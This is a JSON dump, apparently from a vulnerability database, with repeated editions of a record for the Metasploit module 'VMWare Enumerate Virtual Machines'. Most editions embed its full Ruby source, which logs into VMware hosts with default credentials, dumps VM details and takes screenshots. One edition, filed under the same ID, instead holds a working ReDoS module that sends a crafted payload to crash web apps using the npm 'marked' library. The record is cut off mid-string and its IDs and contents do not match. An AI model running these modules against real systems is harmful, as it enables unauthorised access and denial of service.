"OPENVAS:1361412562310113473", "OPENVAS:1361412562310113472", "OPENVAS:1361412562310113464", "OPENVAS:1361412562310113466"]}, {"type": "ics", "idList": ["ICSA-19-239-02"]}], "modified": "2019-08-28T11:10:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-28T11:10:11", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1f3319070d27778afbebe91c42ff24c6", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-17T16:17:01", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-09-17T16:17:01"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:B1118C09064DF01718B2B9F39680EF9A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "TALOSBLOG:1E2F18D6B0605B96B90CCDF5FD0559BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891922", "OPENVAS:1361412562310142898", "OPENVAS:1361412562310891923", "OPENVAS:1361412562310891925", "OPENVAS:1361412562310891924", "OPENVAS:1361412562310142897", "OPENVAS:1361412562310704523", "OPENVAS:1361412562310142890", "OPENVAS:1361412562310113526", "OPENVAS:1361412562310113531"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D6A5EC125A73EA2C09CDDFE0CF187597"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8D5CA98E78BCABD74B9A3277538F2017"]}], "modified": "2019-09-17T16:17:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-17T16:17:01", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-17T18:07:06", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-09-17T18:07:06"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:B1118C09064DF01718B2B9F39680EF9A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "TALOSBLOG:1E2F18D6B0605B96B90CCDF5FD0559BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891922", "OPENVAS:1361412562310142898", "OPENVAS:1361412562310891923", "OPENVAS:1361412562310891925", "OPENVAS:1361412562310142897", "OPENVAS:1361412562310704523", "OPENVAS:1361412562310891924", "OPENVAS:1361412562310113521", "OPENVAS:1361412562310113519", "OPENVAS:1361412562310113526"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D6A5EC125A73EA2C09CDDFE0CF187597"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8D5CA98E78BCABD74B9A3277538F2017"]}], "modified": "2019-09-17T18:07:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-17T18:07:06", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1f3319070d27778afbebe91c42ff24c6", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-05T07:57:10", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-10-05T07:57:10"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:751009970245130177"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876878", "OPENVAS:1361412562310876871", "OPENVAS:1361412562310876874", "OPENVAS:1361412562310876876", "OPENVAS:1361412562310876875", "OPENVAS:1361412562310876873", "OPENVAS:1361412562310876866", "OPENVAS:1361412562310876868", "OPENVAS:1361412562310876877", "OPENVAS:1361412562310876879"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2245-1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46"]}, {"type": "symantec", "idList": ["SMNTC-110280"]}], "modified": "2019-10-05T07:57:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T07:57:10", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-05T10:02:32", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-10-05T10:02:32"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:751009970245130177"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876874", "OPENVAS:1361412562310876871", "OPENVAS:1361412562310876876", "OPENVAS:1361412562310876878", "OPENVAS:1361412562310876866", "OPENVAS:1361412562310876868", "OPENVAS:1361412562310876879", "OPENVAS:1361412562310876877", "OPENVAS:1361412562310876873", "OPENVAS:1361412562310876875"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2245-1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46"]}, {"type": "symantec", "idList": ["SMNTC-110280"]}], "modified": "2019-10-05T10:02:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T10:02:32", "differentElements": ["cvelist", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "4139ba881b0e124face8e6d2699d0282", "type": "metasploit", "bulletinFamily": "exploit", "title": "marked npm module \"heading\" ReDoS", "description": "This module exploits a Regular Expression Denial of Service vulnerability in the npm module \"marked\". The vulnerable portion of code that this module targets is in the \"heading\" regular expression. Web applications that use \"marked\" for generating html from markdown are vulnerable. Versions up to 0.4.0 are vulnerable.\n", "published": "2018-05-31T18:33:09", "modified": "2018-08-16T19:59:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not"], "cvelist": ["CVE-2017-17461"], "lastseen": "2019-10-12T19:56:46", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2019-10-12T19:56:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-17461"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/MARKED_REDOS"]}], "modified": "2019-10-12T19:56:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/marked_redos.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'marked npm module \"heading\" ReDoS',\n 'Description' => %q{\n This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.\n },\n 'References' =>\n [\n ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],\n ['CWE', '400']\n ],\n 'Author' =>\n [\n 'Adam Cazzolla, Sonatype Security Research',\n 'Nick Starke, Sonatype Security Research'\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options([\n Opt::RPORT(80),\n OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']),\n OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']),\n OptString.new('TARGETURI', [true, 'The URL Path to use', '/'])\n ])\n end\n\n def run\n if test_service\n trigger_redos\n test_service_unresponsive\n else\n fail_with(Failure::Unreachable, \"#{peer} - Could not communicate with service.\")\n end\n end\n\n def trigger_redos\n begin\n print_status(\"Sending ReDoS request to #{peer}.\")\n\n params = {\n 'uri' => normalize_uri(target_uri.path),\n 'method' => datastore['HTTP_METHOD'],\n (\"vars_#{datastore['HTTP_METHOD'].downcase}\") => {\n datastore['HTTP_PARAMETER'] => \"# #\" + (\" \" * 20 * 1024) + Rex::Text.rand_text_alpha(1)\n }\n }\n\n res = send_request_cgi(params)\n\n if res\n fail_with(Failure::Unknown, \"ReDoS request unsuccessful. Received status #{res.code} from #{peer}.\")\n end\n\n print_status(\"No response received from #{peer}, service is most likely unresponsive.\")\n rescue ::Rex::ConnectionRefused\n print_error(\"Unable to connect to #{peer}.\")\n rescue ::Timeout::Error\n print_status(\"No HTTP response received from #{peer}, this indicates the payload was successful.\")\n end\n end\n\n def test_service_unresponsive\n begin\n print_status('Testing for service unresponsiveness.')\n\n res = send_request_cgi({\n 'uri' => '/' + Rex::Text.rand_text_alpha(8),\n 'method' => 'GET'\n })\n\n if res.nil?\n print_good('Service not responding.')\n else\n print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')\n end\n rescue ::Rex::ConnectionRefused\n print_error('An unknown error occurred.')\n rescue ::Timeout::Error\n print_good('HTTP request timed out, most likely the ReDoS attack was successful.')\n end\n end\n\n def test_service\n begin\n print_status('Testing Service to make sure it is working.')\n\n res = send_request_cgi({\n 'uri' => '/' + Rex::Text.rand_text_alpha(8),\n 'method' => 'GET'\n })\n\n if res && res.code >= 100 && res.code < 500\n print_status(\"Test request successful, attempting to send payload. Server returned #{res.code}\")\n return true\n else\n return false\n end\n rescue ::Rex::ConnectionRefused\n print_error(\"Unable to connect to #{peer}.\")\n return false\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-12T19:56:46", "differentElements": ["cvelist", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-12T23:50:34", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-10-12T23:50:34"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:4807024198181683902", "KITPLOIT:753502859102214522", "KITPLOIT:6224374959360025978", "KITPLOIT:5984639588103234893", "KITPLOIT:7842853011213233978", "KITPLOIT:3364109522322011176"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154823"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876895", "OPENVAS:1361412562310876896", "OPENVAS:1361412562310844199", "OPENVAS:1361412562310852737", "OPENVAS:1361412562310815497", "OPENVAS:1361412562310815496", "OPENVAS:1361412562310815495"]}, {"type": "cve", "idList": ["CVE-2019-5527", "CVE-2019-5535"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:86C26266774161075BFD1BBE158CE9EE"]}, {"type": "redhat", "idList": ["RHSA-2019:2995"]}, {"type": "mskb", "idList": ["KB4052908"]}], "modified": "2019-10-12T23:50:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: 